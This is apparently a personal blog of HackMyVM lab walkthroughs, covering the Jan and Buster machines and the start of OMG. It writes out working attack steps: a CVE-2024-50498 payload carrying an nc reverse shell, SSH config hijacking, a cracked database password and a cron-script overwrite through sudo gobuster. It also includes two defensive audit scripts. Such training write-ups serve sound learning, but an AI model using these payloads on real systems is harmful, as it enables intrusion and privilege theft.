HMV
HMV: Setting Sail
0x00 Preface
While studying penetration testing recently, I happened to notice that my friend f4k3r had shared a time-limited free lab, Thunder. I gave it a try and found I could only get flag1; the later flags seemed to require AV evasion, getting a CS beacon online and the like, which I am not yet good at. I asked f4k3r how he knew about this lab, and he said it had been posted in a pentesting group chat and he had simply forwarded it, so I decided to join the group to learn. Once in, I found it was full of experts who kept saying "HMV, go!". At first I had no idea what HMV was; after lurking for a while I learned it is a site called HackMyVM with more than 280 machines, sorted by difficulty, some of them quite beginner-friendly. I had only finished DC-6 the day before and felt what I had learned was still basic (fundamentals first, of course), so I planned to finish the DC series before trying HMV machines. Before going to sleep I looked at the group owner's Bilibili channel and found many lab walkthrough videos, explained in fair detail (though I have only watched a few of them), and happened to see
[Introduction to common lab sites such as HackMyVM (with links to experts' blogs)] https://www.bilibili.com/video/BV1uncUemEUD?vd_source=01f20e8c22d3c3bd0bcfdc7aa4cd8da0
This video explains the basics very thoroughly, covering each page and feature of HackMyVM in detail and listing some experts' blogs for reference. Starting from this video, I planned to do HMV after DC. While watching I found that VirtualBox is needed to import the VMs, so I tried installing it.
0x01 Installing VirtualBox
Just download it from the official site https://www.virtualbox.org/. I recommend installing on the D: drive: create a new folder VirtualBox on D: and install there. Remember to install a Python environment; after that you apparently also need pywin32 (I don't remember the exact name), which can be installed with pip install.
0x02 Fixing errors
The errors I have run into so far had status codes -101 and -104. In the 大傻子的小圈子 group an expert said uninstalling the Perfect World competitive platform (完美世界竞技平台) fixes it, and indeed after uninstalling it the VM would start.
0x03 Network configuration
So that my Kali (VMware) could scan the target machine (VirtualBox), I initially thought it was enough to bridge both Kali and the target to the same Wi-Fi. Not so. After a lot of experimenting, I found that when I created a new network configuration in VMware in bridged mode, bridged to the Host-Only adapter, Kali could scan the target.
Jan
Information gathering
As usual, identify the IP address from the MAC address.
Scan with arp-scan -l; the IP address is 192.168.56.103. Next check the ports with nmap 192.168.56.103: two ports are open. Port 22 is obviously SSH, so let's see what is on port 8080.
Port 8080: user flag
Nothing obvious, so enumerate directories with dirsearch
dirsearch -u http://192.168.56.103
There is a robots.txt, which lists /redirect and /credz, though it is unclear whether these are directories or parameters, so try both. One says it needs a url parameter, the other says it can only be accessed internally. I assumed simply supplying the url parameter would do, but got nothing. I guessed at appending ?url=/credz to /redirect, but that only showed the content of the /credz page itself. After many failed attempts I read the writeup by sunset: https://www.sunset-blog.top/baji/hack-my-vm/Jan.html (it was still up when I did this box; when I checked on 2025/4/26 it was gone)
It turns out the url parameter is passed twice, /redirect?url=1&url=/credz, which yields the SSH username and password
ssh/EazyLOL
Log in over SSH and you get the user flag
HMVSSWYMCNFIBDAFMTHFK
With the user flag in hand, next is privilege escalation for the root flag
Privilege escalation: root flag
We can run /sbin/service sshd restart as root, so the focus should be on SSH
Referring to sunset's blog
SSH public key hijacking
First check the permissions of the SSH directory
ssh_config and sshd_config are writable
ssh-keygen -t rsa generates an RSA SSH key pair. Running it produces a public key and a private key file used for SSH authentication, and creates a .ssh folder in the home directory
jan:/etc/ssh$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/ssh/.ssh/id_rsa): /home/ssh/.ssh
/home/ssh/.ssh already exists.
Overwrite (y/n)? n
jan:/etc/ssh$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/ssh/.ssh/id_rsa):
Enter passphrase for "/home/ssh/.ssh/id_rsa" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/ssh/.ssh/id_rsa
Your public key has been saved in /home/ssh/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:Zk1qHaiYz6IhTLi3t5/4v9+8PceSvbsWY4MBOdrDQyk ssh@jan
The key's randomart image is:
+---[RSA 3072]----+
| o |
| E * |
| . O o |
|. o . * * . |
|.. o . S o o o |
|o. o + . = |
|o.o . o .++|
| o +.o . o .+.+|
| o.o++.oo. +.oB+|
+----[SHA256]-----+
Rename id_rsa.pub, and change the trailing ssh in its content to root (this does not affect the key's operation, but it obscures what the key is)
mv id_rsa.pub attack_keys
Modify the sshd_config configuration file
PermitRootLogin yes
StrictModes no
AuthorizedKeysFile /home/ssh/.ssh/attack_keys
Parameter explanation:
PermitRootLogin yes: allows the root user to log in via SSH.
StrictModes no: disables strict permission checking, so permission problems on the key files do not block the SSH login.
AuthorizedKeysFile /home/ssh/.ssh/attack_keys: uses the custom public key file attack_keys.
Modify ssh_config and comment out the banner
#Banner /etc/shadow
Restart the service and log in with the key file to obtain root privileges
jan:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
jan:~# ls
root.txt ver.sh
jan:~# cat root.txt
HMV2PRMTERWTFUDNGMBG
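As an added defender-side check (my code, not part of the original writeup), the following Python script audits an sshd_config for the three settings changed above plus the Banner directive, and flags configuration files that are not root-owned or are group/other-writable. The two config texts are constructed samples modelled on the values above, and sshd's first-occurrence-wins rule for duplicate keywords is assumed.

```python
"""Audit an sshd_config for the settings abused in the key hijack above.
Added example, not code from the original writeup; the config texts
below are constructed samples based on the values shown on this page."""
import os
import stat

# Constructed sample: the state the hijack leaves behind (see above).
WEAK_CONFIG = """Port 22
PermitRootLogin yes
StrictModes no
AuthorizedKeysFile /home/ssh/.ssh/attack_keys
Banner /etc/shadow
"""

# Constructed sample: a hardened equivalent.
HARDENED_CONFIG = """Port 22
PermitRootLogin no
StrictModes yes
AuthorizedKeysFile .ssh/authorized_keys
#Banner /etc/shadow
"""


def parse_sshd_config(text):
    """Effective top-level options. sshd uses the first value it sees for a
    keyword, so later duplicates are ignored; options inside Match blocks
    are conditional and skipped by this audit."""
    opts = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.lower().startswith("match "):
            break
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        opts.setdefault(parts[0].lower(), parts[1].strip())
    return opts


def audit_sshd_config(text):
    """Return human-readable findings for the given sshd_config text."""
    opts = parse_sshd_config(text)
    findings = []
    if opts.get("permitrootlogin", "").lower() == "yes":
        findings.append("PermitRootLogin yes: root may log in directly")
    if opts.get("strictmodes", "").lower() == "no":
        findings.append("StrictModes no: loosely permissioned key files are accepted")
    for token in opts.get("authorizedkeysfile", "").split():
        # Relative paths resolve under each user's home; an absolute path
        # means one file (possibly user-controlled) authorises every account.
        if token.startswith("/"):
            findings.append(f"AuthorizedKeysFile uses shared absolute path {token}")
    banner = opts.get("banner", "none")
    if banner.lower() != "none":
        # The banner is sent before authentication, so a sensitive path
        # here discloses that file to any client that connects.
        findings.append(f"Banner discloses {banner} to unauthenticated clients")
    return findings


def mode_is_risky(st_uid, st_mode):
    """True if a config file is not root-owned or is group/other-writable."""
    return st_uid != 0 or bool(st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def check_config_file(path):
    """Apply mode_is_risky to a real file on disk (e.g. /etc/ssh/sshd_config)."""
    st = os.stat(path)
    return mode_is_risky(st.st_uid, st.st_mode)


if __name__ == "__main__":
    for finding in audit_sshd_config(WEAK_CONFIG):
        print("[!]", finding)
    print("hardened findings:", audit_sshd_config(HARDENED_CONFIG))
```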
Summary
The Jan machine has a service on port 8080; by submitting parameters you obtain the SSH credentials. After logging in you find the SSH configuration files are writable, which suggests SSH public key hijacking for privilege escalation. Once you think of that, it is straightforward.
Buster
Information gathering
Check the MAC address, 08:00:27:36:6e:6f, and use arp-scan -l to identify the IP address
┌──(root㉿kali-plus)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.56.101
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:17 (Unknown: locally administered)
192.168.56.100 08:00:27:50:3f:be PCS Systemtechnik GmbH
192.168.56.105 08:00:27:36:6e:6f PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.123 seconds (120.58 hosts/sec). 3 responded
The IP address is 192.168.56.105. Scan the ports with nmap
┌──(root㉿kali-plus)-[~]
└─# nmap 192.168.56.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-25 17:44 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.105
Host is up (0.0021s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:36:6E:6F (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
Ports 22 and 80 are open. Looking at port 80 first, it is a WordPress blog, so bring in WPScan
Port 80: user flag
Run wpscan --url http://192.168.56.105 -e u,ap --plugins-detection aggressive
┌──(root㉿kali-plus)-[~]
└─# wpscan --url http://192.168.56.105 -e u,ap --plugins-detection aggressive
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://192.168.56.105/ [192.168.56.105]
[+] Started: Wed Feb 26 14:44:33 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.14.2
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.56.105/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.105/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.105/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.105/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
Fingerprinting the version - Time: 00:00:10 <====================================================================================================================================================> (702 / 702) 100.00% Time: 00:00:10
[i] The WordPress version could not be detected.
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:55:36 <===============================================================================================================================================> (109023 / 109023) 100.00% Time: 00:55:36
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://192.168.56.105/wp-content/plugins/akismet/
| Last Updated: 2025-02-04T21:01:00.000Z
| Readme: http://192.168.56.105/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.3.6
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/akismet/, status: 200
|
| Version: 5.3.5 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/akismet/readme.txt
[+] feed
| Location: http://192.168.56.105/wp-content/plugins/feed/
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/feed/, status: 200
|
| The version could not be determined.
[+] wp-query-console
| Location: http://192.168.56.105/wp-content/plugins/wp-query-console/
| Latest Version: 1.0 (up to date)
| Last Updated: 2018-03-16T16:03:00.000Z
| Readme: http://192.168.56.105/wp-content/plugins/wp-query-console/README.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/wp-query-console/, status: 403
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/wp-query-console/README.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=======================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] ta0
| Found By: Wp Json Api (Aggressive Detection)
| - http://192.168.56.105/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] welcome
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Feb 26 15:40:30 2025
[+] Requests Done: 110362
[+] Cached Requests: 15
[+] Data Sent: 29.523 MB
[+] Data Received: 62.695 MB
[+] Memory used: 407.828 MB
[+] Elapsed time: 00:55:56
The scan finds two usernames and several plugins. The wp-query-console plugin should be vulnerable; a search turns up CVE-2024-50498 for this plugin
POST /wp-json/wqc/v1/query HTTP/1.1
Host: 192.168.56.105
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=wp-query-console
Content-Type: application/json
Content-Length: 45
Origin: http://kubernetes.docker.internal
Connection: keep-alive
Priority: u=0
{"queryArgs":"phpinfo();","queryType":"post"}
The page's response revealed the disable_functions list
Backticks can execute commands, so try to get a reverse shell
POST /wp-json/wqc/v1/query HTTP/1.1
Host: 192.168.56.105
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=wp-query-console
Content-Type: application/json
Content-Length: 70
Origin: http://kubernetes.docker.internal
Connection: keep-alive
Priority: u=0
{"queryArgs":"`nc -e /bin/sh 192.168.56.101 4444`","queryType":"post"}
┌──(root㉿kali-plus)-[~]
└─# nc -lvvp 4444
nc: getnameinfo: Temporary failure in name resolution
nc: getnameinfo: Temporary failure in name resolution
ls
index.php
license.txt
readme.html
update_url.php
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
The reverse shell connected. Spawn an interactive shell with python -c 'import pty;pty.spawn("/bin/bash")'
We have www-data privileges
www-data@listen:~/html/wordpress$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
welcome:x:1001:1001::/home/welcome:/bin/sh
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
There is also a welcome user; presumably we first escalate to welcome and then to root
Some information found in the configuration file
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** Database username */
define( 'DB_USER', 'll104567' );
/** Database password */
define( 'DB_PASSWORD', 'thehandsomeguy' );
Try connecting to the database to look for user credentials
MariaDB [wordpress]> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
| 1 | ta0 | $P$BDDc71nM67DbOVN/U50WFGII6EF6.r. | ta0 | 2814928906@qq.com | http://192.168.31.181 | 2025-01-08 03:10:43 | | 0 | ta0 |
| 2 | welcome | $P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/ | welcome | 127.0.0.1@qq.com | | 2025-01-08 04:29:28 | 1736310568:$P$B2YbhlDVF1XWIurbL11Pfoasb./0tD. | 0 | welcome |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
2 rows in set (0.000 sec)
Try cracking the two accounts' passwords, though ta0's probably can't be cracked (the box would be no fun if it could)
┌──(root㉿kali-plus)-[~]
└─# vi hash
┌──(root㉿kali-plus)-[~]
└─# john hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 16 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
104567 (?)
1g 0:00:00:02 DONE 3/3 (2025-02-26 17:45) 0.3968g/s 73821p/s 73821c/s 73821C/s bosho..shymur
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.
The cracked password is 104567; log in directly
$ cat user.txt
cat user.txt
29e0f786e8c90b3ce82e00de0ec7e7d3
First grab the user flag, then look for a privilege escalation vector
Privilege escalation: root flag
$ sudo -l
Matching Defaults entries for welcome on listen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on listen:
(ALL) NOPASSWD: /usr/bin/gobuster
I tried looking at the file's contents, which are not meant for human reading. A search shows gobuster is an open-source tool for directory and file enumeration; I skimmed a usage tutorial (https://blog.csdn.net/2302_82189125/article/details/135999920)
Try scanning for root.txt: sudo gobuster -u "http://192.168.56.105" -w /root.txt
$ sudo gobuster -u "http://192.168.56.105" -w /root.txt
2025/02/25 10:42:51 [!] 1 error occurred:
* Wordlist (-w): File does not exist: /root.txt
It seems the root flag is not named root.txt. I ran out of ideas here, so I checked the experts' blogs: they used a tool called pspy64 (pspy is a command-line tool that monitors Linux processes without root privileges.)
Copy pspy64 to Kali, start a web server on Kali, and download pspy64 onto the target
python3 -m http.server 80
wget http://192.168.56.101/pspy64
chmod +x pspy64
./pspy64
sudo gobuster -w /opt/.test.sh -u http://192.168.56.105 # default mode is dir (directory scan); -w specifies the wordlist, -u the URL
192.168.56.104 - - [24/Jan/2025 06:21:00] "GET /echo%20test HTTP/1.1" 404 -
2025/02/25 12:12:01 CMD: UID=0 PID=3975 | /bin/sh /sbin/dhclient-script
2025/02/25 12:12:01 CMD: UID=0 PID=3976 | /bin/sh /sbin/dhclient-script
2025/02/25 12:12:01 CMD: UID=0 PID=3977 | /bin/sh /sbin/dhclient-script
2025/02/25 12:12:01 CMD: UID=0 PID=3978 | /usr/sbin/CRON -f
2025/02/25 12:12:01 CMD: UID=0 PID=3979 | /usr/sbin/CRON -f
2025/02/25 12:12:01 CMD: UID=0 PID=3980 | /bin/sh -c /bin/bash /opt/.test.sh
This is part of the pspy64 output. There is a scheduled task running /opt/.test.sh; let's see what it contains
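An added detection example (my code, not from the writeup): it parses pspy-style lines like those above and flags commands run as UID 0 that execute a hidden script or a script outside standard system directories. The sample log is constructed from the lines above plus one non-root line, and the TRUSTED_DIRS and INTERPRETERS lists are my own assumptions.

```python
"""Flag root-run commands in pspy output that execute scripts from hidden
files or non-system directories, like /opt/.test.sh above. Added example,
not from the original writeup; TRUSTED_DIRS and INTERPRETERS are my own
assumptions, and the sample log is constructed from the lines above."""
import re

PSPY_LINE = re.compile(
    r"^(?P<ts>\S+ \S+) CMD: UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\|\s+(?P<cmd>.*)$"
)
# Directories a root cron job is normally expected to execute from (assumption).
TRUSTED_DIRS = ("/bin/", "/sbin/", "/usr/", "/etc/", "/lib/")
# Interpreter binaries: skipped so the script they run is what gets checked.
INTERPRETERS = {"sh", "bash", "dash", "python", "python3", "perl"}

# Constructed sample: the page's pspy lines plus one non-root command.
SAMPLE_LOG = """2025/02/25 12:12:01 CMD: UID=0 PID=3975 | /bin/sh /sbin/dhclient-script
2025/02/25 12:12:01 CMD: UID=0 PID=3978 | /usr/sbin/CRON -f
2025/02/25 12:12:01 CMD: UID=0 PID=3980 | /bin/sh -c /bin/bash /opt/.test.sh
2025/02/25 12:12:02 CMD: UID=1001 PID=3981 | /bin/bash /home/welcome/backup.sh
"""


def parse_pspy(text):
    """Turn pspy CMD lines into dicts; lines that do not match are ignored."""
    events = []
    for line in text.splitlines():
        m = PSPY_LINE.match(line.strip())
        if m:
            ev = m.groupdict()
            ev["uid"], ev["pid"] = int(ev["uid"]), int(ev["pid"])
            events.append(ev)
    return events


def script_paths(cmd):
    """Absolute paths in the command line, excluding the interpreter binaries,
    so '/bin/sh -c /bin/bash /opt/.test.sh' yields ['/opt/.test.sh']."""
    return [tok for tok in cmd.split()
            if tok.startswith("/") and tok.rsplit("/", 1)[-1] not in INTERPRETERS]


def suspicious_root_scripts(text):
    """Return (pid, path, reason) for scripts run as UID 0 that live in a
    hidden file or outside TRUSTED_DIRS."""
    hits = []
    for ev in parse_pspy(text):
        if ev["uid"] != 0:
            continue
        for path in script_paths(ev["cmd"]):
            hidden = any(part.startswith(".") for part in path.split("/") if part)
            if hidden:
                hits.append((ev["pid"], path, "hidden file"))
            elif not path.startswith(TRUSTED_DIRS):
                hits.append((ev["pid"], path, "outside trusted dirs"))
    return hits


if __name__ == "__main__":
    for pid, path, reason in suspicious_root_scripts(SAMPLE_LOG):
        print(f"PID {pid}: {path} ({reason})")
```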
welcome@listen:~$ cat /opt/.test.sh
cat: /opt/.test.sh: Permission denied
Can't read it at all
welcome@listen:/opt$ ls -al
total 12
drwxr-xr-x 2 root root 4096 Jan 7 23:57 .
drwxr-xr-x 18 root root 4096 Jan 7 21:50 ..
-rwx------ 1 root root 10 Jan 7 23:57 .test.sh
Running sudo gobuster -w /opt/.test.sh -u http://192.168.56.105 gives:
welcome@listen:/opt$ sudo gobuster -w /opt/.test.sh -u http://192.168.56.101:9999
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.56.101/
[+] Threads : 10
[+] Wordlist : /opt/.test.sh
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2025/02/25 12:26:20 Starting gobuster
=====================================================
2025/02/25 12:26:20 [!] unable to connect to http://192.168.56.101/: Get http://192.168.56.101/: dial tcp 192.168.56.101:80: connect: connection refused
=====================================================
2025/02/25 12:26:20 Finished
=====================================================
welcome@listen:/opt$ sudo gobuster -w /opt/.test.sh -u http://192.168.56.101:9999
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.56.101:9999/
[+] Threads : 10
[+] Wordlist : /opt/.test.sh
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2025/02/25 12:27:38 Starting gobuster
=====================================================
=====================================================
2025/02/25 12:27:38 Finished
=====================================================
The command sudo gobuster -w /opt/.test.sh -u http://192.168.56.105:9999 uses the contents of /opt/.test.sh as the wordlist and runs a directory scan against the target given by -u. That target is a server we start on Kali, which logs every request it receives, so we learn the contents of /opt/.test.sh
Serving HTTP on 0.0.0.0 port 9999 (http://0.0.0.0:9999/) ...
192.168.56.105 - - [26/Feb/2025 20:12:49] "GET / HTTP/1.1" 200 -
192.168.56.105 - - [26/Feb/2025 20:12:49] code 404, message File not found
192.168.56.105 - - [26/Feb/2025 20:12:49] "GET /77aacc5f-f1f3-4c5f-943f-d890c284bc14 HTTP/1.1" 404 -
192.168.56.105 - - [26/Feb/2025 20:12:49] code 404, message File not found
192.168.56.105 - - [26/Feb/2025 20:12:49] "GET /echo%20test HTTP/1.1" 404 -
It contains an echo test command run by the scheduled task. The next steps are
Create a new folder on Kali, create a file a in it, start a server, then go back to the target and run the gobuster command
mkdir buster
cd buster
touch a
python3 -m http.server 9999
welcome@listen:/opt$ cd /tmp
welcome@listen:/tmp$ ls
systemd-private-62ede0bd298b4c10934121beaac91a3a-systemd-timesyncd.service-4ariZG
welcome@listen:/tmp$ echo 'a' > a.txt
welcome@listen:/tmp$ sudo gobuster -w a.txt -u http://192.168.56.101:9999 -n -q
/a
It returns /a because we turned off status code display with -n and enabled quiet mode with -q, so the output is just the discovered directory path
(provided the folder served on Kali contains a file named a). This lets us assemble strings, so we can try to assemble a reverse-shell command: in the same folder on Kali, create a tmp subfolder (because we are in /tmp on the target) containing a file b
mkdir tmp
cd tmp
touch b
cd ..
python3 -m http.server 9999
welcome@listen:/tmp$ echo 'nc -e /bin/bash 192.168.56.101 4444' > b
welcome@listen:/tmp$ chmod +x b
welcome@listen:/tmp$ pwd
/tmp
welcome@listen:/tmp$ echo 'tmp/b' > a.txt
welcome@listen:/tmp$ sudo gobuster -w a.txt -u http://192.168.56.101:9999 -n -q
/tmp/b
The purpose of this step is to produce the path /tmp/b, where b on the target holds the reverse-shell command. Now add the -o option to the same command; it writes the command's output to the specified file, so /tmp/b (the file that runs nc -e /bin/bash 192.168.56.101 4444) is written into the scheduled task /opt/.test.sh, and when the task runs we get a reverse shell
sudo gobuster -w a.txt -u http://192.168.56.101:9999 -n -q -o /opt/.test.sh
┌──(root㉿kali-plus)-[~]
└─# nc -lvvp 4444
nc: getnameinfo: Temporary failure in name resolution
id
nc: getnameinfo: Temporary failure in name resolution
uid=0(root) gid=0(root) groups=0(root)
The listener has caught the connection; now just grab the root flag
Summary
This box is quite straightforward to break into from the outside. The blog runs on WordPress, so scan it with wpscan first; that reveals some plugins, for which a vulnerability and a ready-made PoC can be found. Using it directly gives command execution and a reverse shell. There are two other users, and since it is WordPress with a config file, we obtain the database credentials, connect, and find welcome's password. Logging in as welcome gives the user flag. Privilege escalation revolves around gobuster, which can read file contents and also write output to a specified file, so the reverse-shell command can be written into the scheduled script; pspy64, a tool that reveals scheduled tasks without root privileges, helped find that script. Once the scheduled task runs, we get a root shell, completing the escalation.
OMG
Information gathering
First, this is a Windows VM; import it with VMware, as VirtualBox throws an error. After importing, identify the IP address: the MAC address is 00:0C:29:E7:D5:95, and arp-scan gives 192.168.136.134. Then scan the ports
┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.136.134 -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2025-02-26 20:54 EST
Nmap scan report for bogon (192.168.136.134)
Host is up (0.00030s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
MAC Address: 00:0C:29:E7:D5:95 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.81 seconds
Looking up the author, I found his blog https://blog.orange.tw/, where I saw a CVE number and guessed this machine relates to that CVE. Search for it in msf; mine hadn't been updated in a long time and the old version couldn't find this CVE, so just update it
user flag and root flag
┌──(root㉿kali)-[~]
└─# msfconsole
Metasploit tip: When in a module, use back to go back to the top level
prompt
=[ metasploit v6.4.50-dev ]
+ -- --=[ 2495 exploits - 1283 auxiliary - 393 post ]
+ -- --=[ 1607 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search CVE-2024-4577
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577 2024-06-06 excellent Yes PHP CGI Argument Injection Remote Code Execution
1 \_ target: Windows PHP . . . .
2 \_ target: Windows Command . . . .
Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command'
msf6 > use 0
